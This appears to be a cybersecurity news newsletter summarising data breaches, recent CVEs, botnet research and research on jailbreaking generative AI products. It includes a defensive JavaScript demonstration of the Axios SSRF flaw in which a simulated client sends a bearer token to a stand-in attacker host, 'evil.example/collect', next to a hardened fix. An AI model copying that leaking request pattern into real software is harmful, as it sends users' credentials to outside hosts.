Secret CISO 3/8: Estrella and Hillcrest Data Breaches, Chicago Public Schools and NTT Com Hacked, India's Security Breach in UK, Research on Ransomware and AI Security

Welcome to today's issue of Secret CISO, your daily dose of the most impactful cybersecurity news.
Today, we delve into a series of data breaches that have rocked various sectors, from insurance and healthcare to education and telecommunications. Estrella Insurance and Hillcrest Convalescent Center are under investigation for data breaches that exposed personal information, including Social Security numbers and financial information. Chicago Public Schools also suffered a data breach, although no Social Security numbers or financial information were reportedly accessed. On the international front, India has expressed deep concern over a security breach involving UK-based separatist and extremist elements. In Japan, telecom giant NTT Com disclosed a data breach that affected almost 18,000 organizations.
In the legal arena, Central Texas Pediatric Orthopedics faces a class-action lawsuit over a data breach, and Archie Cochrane Motors is under investigation for a similar incident. In the realm of cybercrime, hackers leaked sensitive data from an elite Bronx private school following a ransomware attack, and a massive breach exposed Chicago Public Schools student data. In other news, USAA has settled a $3.25 million lawsuit over a 2021 data breach affecting 22,000 customers, and the US seized $23 million in crypto stolen via a password manager breach.
As we navigate the evolving landscape of cyber threats, we also highlight the need for defenders to keep up with the 'commoditization' of ransomware and the importance of vulnerability disclosures among federal contractors. Stay tuned for more updates and remember, knowledge is the first line of defense. Stay safe, stay informed with Secret CISO.
Data Breaches
- Federman & Sherwood Investigates Estrella Insurance for Data Breach: On February 1, 2025, Estrella Insurance experienced a data breach in which personal information such as names and Social Security numbers was accessed. Source: Morningstar
- Hillcrest Convalescent Center Data Breach: Personal information including names, Social Security numbers, dates of birth, financial information, and medical data may have been exposed in a data breach at Hillcrest Convalescent Center. Source: Post Register
- Chicago Public Schools Data Breach: Chicago Public Schools reported a data breach; however, no Social Security numbers, financial information, or health data were accessed during this incident. Source: NBC Chicago
- Japanese Telco Giant NTT Com Data Breach: NTT Com, a Tokyo-based company providing phone and network technology to enterprises, reported a data breach on February 5, 2025, in which attackers accessed details of almost 18,000 organizations. Source: TechCrunch
- Central Texas Pediatric Orthopedics Data Breach: Central Texas Pediatric Orthopedics experienced a data breach that potentially affects its patients. Legal action may be taken to recover damages. Source: Class Action
Security Research
- Malicious Fake Toll Scams: Security researchers have identified a new scam linked to Chinese smishing groups. These groups are known for creating and selling sophisticated SMS phishing kits, which are now being used to target drivers with fake toll scams. Source: The Trucker
- LastPass Hacks Linked to $150M Cyberheist: In 2023, security researchers began tracking a series of six-figure cryptocurrency heists. Federal investigators have now linked a $150 million theft to the LastPass breaches of 2022. The practical caveat for defenders: secrets held in a vault whose encrypted copy was stolen remain at risk until they are rotated, however strong the vault's encryption. Source: Krebs on Security
- Climate Change Impact on Food Security: Researchers have found that climate change will increasingly impact our health and food security. More heavy rainfall events are expected, which could lead to an increase in E. coli outbreaks. Source: The Cooldown
- Eleven11bot and the Mirai Variant: Security researchers have revised their estimates of the size of Eleven11bot, a botnet of compromised IoT devices used for DDoS attacks against the telecom and gaming industries. The botnet is now believed to be a Mirai variant. Source: Cybersecurity Dive
- Jailbreaking LLMs to Reveal Sensitive Data: Researchers have successfully jailbroken 17 popular generative AI (GenAI) web products, revealing weaknesses in their safety measures and exposing sensitive data. Source: GBHackers
Top CVEs
- Microsoft Edge Spoofing Vulnerability (CVE-2025-26643): An unauthorized attacker can perform spoofing in Microsoft Edge (Chromium-based). No CWE has been assigned to the issue. Source: CVE-2025-26643
- Axios SSRF and Credential Leakage Vulnerability (CVE-2025-27152): Axios, a promise-based HTTP client for the browser and Node.js, is vulnerable to SSRF and credential leakage when an absolute URL, rather than a protocol-relative or relative URL, is passed to a client configured with baseURL: the request goes to the absolute URL instead of the intended host. This issue impacts both server-side and client-side usage of Axios. Source: CVE-2025-27152
- Cognita Path Traversal Vulnerability (CVE-2025-27519): Cognita, a RAG framework for building modular applications, has a path traversal issue at /v1/internal/upload-to-local-directory which can be exploited when the Local environment variable is set to true. This allows an attacker to gain remote code execution in the context of the Docker container. Source: CVE-2025-27519
- Sage 200 Spain Pass-Back Vulnerability (CVE-2025-1886): Sage 200 Spain versions prior to 2025.35.000 are vulnerable to a pass-back vulnerability that allows an authenticated attacker with administrator privileges to discover stored SMTP credentials. Source: CVE-2025-1886
- WPCOM Member Plugin Authentication Bypass (CVE-2025-1475): The WPCOM Member plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.5 due to insufficient verification on the 'user_phone' parameter when logging in. This allows unauthenticated attackers to log in as any existing user on the site. Source: CVE-2025-1475
API Security
- Axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL: Axios, a popular HTTP client, has been found to be vulnerable to Server-Side Request Forgery (SSRF) and potential credential leakage when passing absolute URLs. This issue affects both server-side and client-side usage of Axios. The vulnerability arises when baseURL is set but the request URL is absolute: Axios sends the request to the absolute URL and ignores baseURL, so any default headers configured on the client travel with it. This can lead to SSRF and the leakage of sensitive information such as API keys. Source: Vulners
- Exploit for CVE-2024-57972: This exploit targets a Denial of Service (DoS) vulnerability in HoloLens via Device Portal functionality. The attack requires the attacker to be on the same network as the target. The attacker can use a network scanner to identify available devices, then overload the target so that it becomes unresponsive to requests. Source: Vulners
- CVE-2024-13857: The WPGet API – Connect to any external REST API plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in all versions up to, and including, 2.2.10. This vulnerability allows authenticated attackers with Administrator-level access to make web requests to arbitrary locations originating from the web application. This could be used to query and modify information from internal networks. Source: Vulners
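The two Axios entries (under Top CVEs and API Security) describe the same mechanism: with baseURL set, an absolute or protocol-relative request URL wins and the client's default headers go with it. The block below is an added example written for this newsletter, not axios project code; it re-implements the URL-combining logic in a few lines so it runs offline, simulates a client that attaches a bearer token, and contrasts the vulnerable resolver with one that refuses to leave the configured origin. All hosts, paths and the token are constructed.

```javascript
// Added example, not axios project code. It re-implements the URL-combining
// behaviour that CVE-2025-27152 describes (an absolute or protocol-relative
// request URL overrides baseURL) and contrasts it with a resolver that
// refuses to leave the configured origin and path prefix.
// All hosts, paths and the token below are constructed for the example.

// Matches "scheme://..." and protocol-relative "//..." URLs.
const ABSOLUTE_URL_RE = /^([a-z][a-z\d+\-.]*:)?\/\//i;

function isAbsoluteURL(url) {
  return ABSOLUTE_URL_RE.test(url);
}

// Vulnerable pattern: baseURL is only applied when the request URL is
// relative, so a caller-controlled absolute URL is used verbatim.
function buildFullPathVulnerable(baseURL, requestedURL) {
  if (baseURL && !isAbsoluteURL(requestedURL)) {
    return baseURL.replace(/\/?\/$/, '') + '/' + requestedURL.replace(/^\/+/, '');
  }
  return requestedURL;
}

// Hardened pattern: reject absolute and protocol-relative input outright,
// resolve the remainder against baseURL, then verify the result stayed on
// the same origin and under the base path. The origin check also catches
// inputs the regex misses, such as "\\evil.example/x" (the WHATWG parser
// treats backslashes as slashes) and scheme-only inputs like "mailto:".
function buildFullPathSafe(baseURL, requestedURL) {
  if (isAbsoluteURL(requestedURL)) {
    throw new Error('absolute and protocol-relative URLs are not allowed with baseURL');
  }
  const base = new URL(baseURL);
  const prefix = base.pathname.endsWith('/') ? base.pathname : base.pathname + '/';
  const resolved = new URL(requestedURL.replace(/^\/+/, ''), base.origin + prefix);
  if (resolved.origin !== base.origin || !resolved.pathname.startsWith(prefix)) {
    throw new Error(`refusing request outside ${base.origin}${prefix}`);
  }
  return resolved.href;
}

// Simulated client instance that, like an HTTP client configured with
// default headers, attaches a bearer token to every request it builds.
function simulateRequest(resolver, baseURL, userPath, token) {
  const url = resolver(baseURL, userPath);
  return { url, headers: { Authorization: `Bearer ${token}` } };
}

// Returns true when the hardened resolver rejects the input.
function safeRejects(baseURL, userPath) {
  try {
    buildFullPathSafe(baseURL, userPath);
    return false;
  } catch {
    return true;
  }
}

const BASE = 'https://api.internal.example/v1'; // constructed
const TOKEN = 'constructed-secret-token';       // constructed

// Stand-alone demonstration.
const leaked = simulateRequest(buildFullPathVulnerable, BASE, 'https://evil.example/collect', TOKEN);
console.log('vulnerable ->', leaked.url, 'with', leaked.headers.Authorization);
console.log('hardened rejects absolute URL:', safeRejects(BASE, 'https://evil.example/collect'));
console.log('hardened rejects protocol-relative:', safeRejects(BASE, '//evil.example/collect'));
console.log('hardened allows:', buildFullPathSafe(BASE, '/users/1'));
```

The hardened resolver is deliberately stricter than a general-purpose client needs to be: it refuses even a same-origin absolute URL, on the grounds that a request path assembled from user input should never carry its own scheme or host. Upstream addressed the issue in axios 1.8.2 by adding an allowAbsoluteUrls option; that version and option name come from the axios advisory, not from this page, so check the advisory for the exact semantics before relying on them.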
Sponsored by Wallarm API Security Solution
Final Words
And that's a wrap for today's edition of Secret CISO. We've covered a range of data breaches and security issues, from Estrella Insurance to Central Texas Pediatric Orthopedics. It's clear that no sector is immune to these threats, highlighting the importance of robust cybersecurity measures. Remember, knowledge is power. By staying informed about these incidents, we can better protect our own systems and data.
If you found this newsletter helpful, please consider sharing it with your colleagues and friends. Let's work together to create a safer digital world. Stay safe and see you in the next edition of Secret CISO.